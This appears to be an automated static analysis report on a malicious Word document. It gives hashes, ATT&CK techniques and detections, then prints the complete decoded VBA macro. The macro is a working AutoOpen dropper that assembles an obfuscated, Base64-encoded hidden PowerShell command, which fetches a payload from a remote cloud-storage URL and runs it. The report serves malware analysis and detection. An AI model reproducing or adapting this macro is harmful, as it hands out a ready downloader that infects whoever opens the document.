Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f76e67860a094543…

MALICIOUS

Office (OLE)

Size: 269.0 KB
Created: 2018-02-27 16:13:00
Authoring application: Microsoft Office Word
First seen: 2018-07-08
MD5: c963e50beec751108075c4974b1eb785
SHA-1: 2cf6d302ec409fb9d15f2de44148cb483b3d1377
SHA-256: f76e67860a09454333719ff1c5078028bb17ac48921dbaf94cbf5a9a1cdce7bb
Risk score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the macro runs as soon as the document is opened. The macro calls Shell(), indicating an attempt to execute an external command. The ClamAV detection name 'Doc.Dropper.Agent-6460481-0' further supports its classification as a dropper. The macro assembles its command through obfuscated string concatenation (single characters picked from a lookup array, plus chunks of Base64-encoded text), which suggests it is preparing to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6460481-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460481-0
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched lines in script:
        IN_PA = IN_PA + JP_NF
        Shell$ IN_PA
    End Sub
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
    Attribute VB_Name = "cherrycoke"
    Sub AutoOpen()
        Dim IN_PA As String
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6164 bytes
SHA-256: e2619aedabeaa521ad516c8d0dfa1bf4fb311876037e9a442bb04ff61695c9d9

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cherrycoke"
Sub AutoOpen()
    Dim IN_PA As String
    JT_QH = Array(" ", "e", "o", "t", "s", "a", "r", "x", "l", "p", "n", "-", "u", "c", "b", "h", "y", "d", "i", "w")
    Dim DS_QF As String
    DS_QF = "ZgB1AG4AYwB0"
    IN_PA = IN_PA + JT_QH(9)
    IN_PA = IN_PA + JT_QH(2)
    Dim IT_LI As String
    IT_LI = "AGkAbwBuACAAYQAoACQ"
    IN_PA = IN_PA + JT_QH(19)
    IN_PA = IN_PA + JT_QH(1)
    Dim FS_TJ As String
    FS_TJ = "AeAApAHsAcgBlAHQAdQByAG4A"
    IN_PA = IN_PA + JT_QH(6)
    IN_PA = IN_PA + JT_QH(4)
    Dim AN_QJ As String
    AN_QJ = "IABbAFMAeQBzAHQAZQBt"
    IN_PA = IN_PA + JT_QH(15)
    IN_PA = IN_PA + JT_QH(1)
    Dim GM_LI As String
    GM_LI = "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
    JP_NF = JP_NF & DS_QF & IT_LI & FS_TJ & AN_QJ & GM_LI
    IN_PA = IN_PA + JT_QH(8)
    IN_PA = IN_PA + JT_QH(8)
    Dim HT_MD As String
    HT_MD = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuA"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim CN_LF As String
    CN_LF = "GcAKABbAFMAeQBzAHQAZQ"
    IN_PA = IN_PA + JT_QH(19)
    IN_PA = IN_PA + JT_QH(18)
    Dim BR_MI As String
    BR_MI = "BtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwB"
    IN_PA = IN_PA + JT_QH(10)
    IN_PA = IN_PA + JT_QH(17)
    Dim AQ_NB As String
    AQ_NB = "tAEIAYQBzAGUANgA0AFMAdAByAGkAbg"
    IN_PA = IN_PA + JT_QH(2)
    IN_PA = IN_PA + JT_QH(19)
    Dim GK_NE As String
    GK_NE = "BnACgAJAB4ACkAKQB9ADsAaQ"
    JP_NF = JP_NF & HT_MD & CN_LF & BR_MI & AQ_NB & GK_NE
    IN_PA = IN_PA + JT_QH(4)
    IN_PA = IN_PA + JT_QH(3)
    Dim BM_OD As String
    BM_OD = "BlAHgAIAAkACgAYQAgACQAKAAkACgAJA"
    IN_PA = IN_PA + JT_QH(16)
    IN_PA = IN_PA + JT_QH(8)
    Dim GO_SI As String
    GO_SI = "AoAGkAbgB2AG8AawBlAC0AdwBlAGIAc"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(0)
    Dim AQ_KJ As String
    AQ_KJ = "gBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAHUA"
    IN_PA = IN_PA + JT_QH(15)
    IN_PA = IN_PA + JT_QH(18)
    Dim AS_TJ As String
    AS_TJ = "cwBwAHIAZAA1ADEANQ"
    IN_PA = IN_PA + JT_QH(17)
    IN_PA = IN_PA + JT_QH(17)
    Dim DT_LF As String
    DT_LF = "AwAGMAZQBuA"
    JP_NF = JP_NF & BM_OD & GO_SI & AQ_KJ & AS_TJ & DT_LF
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(10)
    Dim IO_SH As String
    IO_SH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim HN_SI As String
    HN_SI = "BpAG4AZ"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(7)
    Dim IM_NI As String
    IM_NI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHI"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(13)
    Dim HS_KF As String
    HS_KF = "AZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAH"
    IN_PA = IN_PA + JT_QH(12)
    IN_PA = IN_PA + JT_QH(3)
    Dim HR_KI As String
    HR_KI = "IAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZ"
    JP_NF = JP_NF & IO_SH & HN_SI & IM_NI & HS_KF & HR_KI
    IN_PA = IN_PA + JT_QH(18)
    IN_PA = IN_PA + JT_QH(2)
    Dim FR_LD As String
    FR_LD = "QBxACUAMgAwACUAMgA3AHMA"
    IN_PA = IN_PA + JT_QH(10)
    IN_PA = IN_PA + JT_QH(9)
    Dim DR_NI As String
    DR_NI = "dABhAGcAZQAlADIANwAmACQAUwBlAGwAZQ"
    IN_PA = IN_PA + JT_QH(2)
    IN_PA = IN_PA + JT_QH(8)
    Dim CL_LG As String
    CL_LG = "BjAHQAPQBkAGEAdABhACYAc"
    IN_PA = IN_PA + JT_QH(18)
    IN_PA = IN_PA + JT_QH(13)
    Dim EP_LH As String
    EP_LH = "wB2AD0AMgAwADEAN"
    IN_PA = IN_PA + JT_QH(16)
    IN_PA = IN_PA + JT_QH(0)
    Dim FT_NF As String
    FT_NF = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxA"
    JP_NF = JP_NF & FR_LD & DR_NI & CL_LG & EP_LH & FT_NF
    IN_PA = IN_PA + JT_QH(14)
    IN_PA = IN_PA + JT_QH(16)
    Dim DT_MC As String
    DT_MC = "HQAJgBz"
    IN_PA = IN_PA + JT_QH(9)
    IN_PA = IN_PA + JT_QH(5)
    Dim HR_MB As String
    HR_MB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABhA"
    IN_PA = IN_PA + JT_QH(4)
    IN_PA = IN_PA + JT_QH(4)
    Dim ET_NJ As String
    ET_NJ = "GMAdQBwACYAcwBlAD0AMgAwADEANwAtADEAMA"
    IN_PA = IN_PA + JT_QH(0)
    IN_PA = IN_PA + JT_QH(11)
    Dim EL_OA As String
    EL_OA = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB"
    IN_PA = IN_PA + JT_QH(1)
    IN_PA = IN_PA + JT_QH(0)
    Dim JS_SD As String
    JS_SD = "0AD0AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA6A"
    JP_NF = JP_NF & DT_MC & HR_MB & ET_NJ & EL_OA & JS_SD
    Dim FL_PE As String
    FL_PE = "DEAMgBaACYA"
    Dim EK_OC As String
    EK_OC = "cwBwAHIAPQBoAHQAd"
    Dim FS_KJ As String
    FS_KJ = "ABwAHMAJgBzAGkAZwA9AHQA"
    Dim EP_NH As String
    EP_NH = "egBQADcAYwA4AHgAWgBoAH"
    Dim FO_ND As String
    FO_ND = "IAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAU"
    JP_NF = JP_NF & FL_PE & EK_OC & FS_KJ & EP_NH & FO_ND
    Dim FN_LG As String
    FN_LG = "wBIAEIANgBlADgAJQAyAEI"
    Dim DQ_TG As String
    DQ_TG = "AbgBsAGwAdQBuAEgAaQBmAEwAMwBoAH"
    Dim AM_LI As String
    AM_LI = "gAagA0ACUAMwB"
    Dim HO_LC As String
    HO_LC = "EACcAIAAtAEgAZQB"
    Dim GP_TI As String
    GP_TI = "hAGQAZQByAHMAIABAAHsAJwB"
    JP_NF = JP_NF & FN_LG & DQ_TG & AM_LI & HO_LC & GP_TI
    Dim FS_TA As String
    FS_TA = "BAGMAYwBlAHAAdAAn"
    Dim JP_ND As String
    JP_ND = "AD0AJwBBAHA"
    Dim DQ_RJ As String
    DQ_RJ = "AcABsAGkAYwBh"
    Dim FL_SJ As String
    FL_SJ = "AHQAaQBvAG4ALwBKAFMATwBOAC"
    Dim BP_KE As String
    BP_KE = "cAfQApAC4AQwBvAG4AdABlAG4AdAAgAHw"
    JP_NF = JP_NF & FS_TA & JP_ND & DQ_RJ & FL_SJ & BP_KE
    Dim FT_LG As String
    FT_LG = "AIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBK"
    JP_NF = JP_NF & FT_LG
    Dim CN_MF As String
    CN_MF = "AHMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhAC"
    JP_NF = JP_NF & CN_MF
    Dim HR_RB As String
    HR_RB = "kAKQA="
    JP_NF = JP_NF & HR_RB
    IN_PA = IN_PA + JP_NF
    Shell$ IN_PA
End Sub